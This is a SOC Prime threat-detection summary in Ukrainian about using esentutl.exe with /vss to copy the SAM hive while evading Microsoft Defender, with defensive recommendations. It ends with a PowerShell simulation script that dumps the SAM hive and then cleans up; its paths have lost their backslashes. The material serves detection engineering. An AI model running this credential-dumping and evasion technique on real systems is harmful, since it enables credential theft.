SOC Prime Bias: Середній

28 Apr 2026 15:51 UTC

Місяць обходів: Що пропускає Defender

Author Photo
SOC Prime Team linkedin icon Стежити
Місяць обходів: Що пропускає Defender
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Команда Persistent Security описує новий спосіб обходу виявлення техніки переносу облікових даних T1003.002 шляхом зловживання підписаною утилітою Windows esentutl.exe. Використовуючи прапорці, пов’язані з VSS, інструмент може копіювати SAM and вулика SYSTEM реєстру без спрацювання Microsoft Defender так само, як при більш загальних методах переносу.

Розслідування

Дослідники перевірили три традиційні підходи до переносу вуликів, включаючи reg save, створення тіньових копій за допомогою vssadmin і пряме копіювання файлів, і виявили, що Defender заблокував кожен з них. Потім вони використовували тестування варіантів з підтримкою ШІ для виявлення альтернативного шляху: esentutl.exe могли отримати доступ до вуликів та вилучити їх через вбудовану функціональність VSS, уникаючи існуючих виявлень Defender.

Захист

Рекомендовані заходи захисту включають обмеження esentutl.exe через AppLocker або WDAC, створення правил Sysmon для виявлення запусків esentutl які використовують /vss прапор, та моніторинг активності з тіньовими копіями, що ініціюються поза нормальної поведінки системи. Організації також повинні розгортати LAPS для локальних облікових записів адміністратора та відключати VSS, де це не є необхідним для роботи.

Відповідь

If esentutl.exe спостерігається запуск з /vss прапором та записом у файли, пов’язані з SAM or вулика SYSTEM, захисники повинні ізолювати вражений хост, зібрати дані пам’яті та реєстру, підтвердити, чи відбулося перенесення облікових даних, і застосувати рекомендовані політики для запобігання повторення.

Потік атаки

Виконання симуляції

Попередні умови: Перевірка телеметрії та базова перевірка перед запуском повинні були пройдені.

Обґрунтування: цей розділ детально описує точне виконання техніки супротивника (TTP), розробленої для спрацювання правила виявлення. Команди та розповідь МАЮТЬ безпосередньо відображати ідентифіковані TTP та націлені на генерацію точної телеметрії, яку очікує логіка виявлення.

  • Опис атаки та команди:
    Зловмисник, який отримав точку опори на скомпроментованому хості Windows, хоче зібрати геші облікових даних, не спрацювання звичайних інструментів переносу облікових даних, що зазвичай контролюються. Атакувальник використовує вбудовану esentutl.exe бінарний файл з /vss перемикачем для створення тіньової копії тома системи та вилучення захищеного вулика SAM. Кроки:

    1. Створіть тимчасову директорію для експорту знімка.
    2. Запустіть esentutl.exe з /y (перезапис) та /vss прапорцями, націлюючись на шлях до вулика SAM.
    3. Скопіюйте експортований файл SAM до місця під контролем атакувальника.
    4. (Необов’язково) Видаліть тимчасовий файл знімка для зменшення судово-медичного відбитку.

    Ця послідовність створює подію Sysmon ProcessCreate, де Зображення закінчується на esentutl.exe and КоманднийРядок містить рядок /vss, що відповідає правилу виявлення.

  • Скрипт для регресійного тесту:

    # ----------------------------------------------
    # Імітація переносу SAM на основі VSS за допомогою esentutl
    # ----------------------------------------------
    $tempDir = "$env:TEMPVSS_Export"
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null
    
    # Шлях до вулика SAM (буде експортуватися тільки копія для читання)
    $samHive = "$env:SystemRootSystem32configSAM"
    $outputFile = Join-Path $tempDir "SAM_copy.edb"
    
    # Виконайте esentutl з VSS, щоб експортувати вулик SAM
    $esentPath = "$env:SystemRootSystem32esentutl.exe"
    $arguments = "/y /vss `"$samHive`" `"$outputFile`""
    
    Write-Host "Запуск: $esentPath $arguments"
    & $esentPath $arguments
    
    # Перевірте, чи експорт вдалий
    if (Test-Path $outputFile) {
        Write-Host "Вулик SAM експортовано до $outputFile"
    } else {
        Write-Warning "Експорт не вдався або файл не створено."
    }
    
    # Очистити файл знімка (необов'язково, залежить від поведінки ОС)
    # Примітка: файли знімків VSS зазвичай видаляються автоматично після експорту.
  • Команди для очищення:

    # Видалити тимчасову директорію експорту та файли
    $tempDir = "$env:TEMPVSS_Export"
    if (Test-Path $tempDir) {
        Remove-Item -Recurse -Force -Path $tempDir
        Write-Host "Очистка завершена: $tempDir видалено."
    } else {
        Write-Host "Очищення не потрібне; директорію не знайдено."
    }